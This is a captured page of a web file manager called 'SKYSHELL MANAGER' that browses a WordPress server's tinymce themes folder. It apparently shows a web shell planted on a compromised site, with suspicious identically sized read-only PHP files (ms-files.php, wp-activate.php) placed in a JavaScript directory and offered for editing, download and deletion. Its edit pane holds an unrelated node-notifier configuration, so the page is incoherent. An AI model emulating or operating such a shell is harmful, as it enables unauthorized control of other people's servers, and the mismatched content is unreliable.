📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: node-notifier.js
'use strict'; module.exports = { pkg: { patches: { 'notifiers/balloon.js': [ "__dirname, '../vendor/notifu/notifu'", "path.dirname(process.execPath), 'notifier/notifu'", ], 'notifiers/notificationcenter.js': [ "__dirname,\n '../vendor/terminal-notifier.app/Contents/MacOS/terminal-notifier'", "path.dirname(process.execPath), 'notifier/terminal-notifier'", ], 'notifiers/toaster.js': [ "__dirname, '../vendor/snoreToast/snoretoast'", "path.dirname(process.execPath), 'notifier/snoretoast'", ], }, deployFiles: [ ['vendor/notifu/notifu.exe', 'notifier/notifu.exe'], ['vendor/notifu/notifu64.exe', 'notifier/notifu64.exe'], [ 'vendor/terminal-notifier.app/Contents/MacOS/terminal-notifier', 'notifier/terminal-notifier', ], ['vendor/snoreToast/snoretoast-x64.exe', 'notifier/snoretoast-x64.exe'], ['vendor/snoreToast/snoretoast-x86.exe', 'notifier/snoretoast-x86.exe'], ], }, };
Save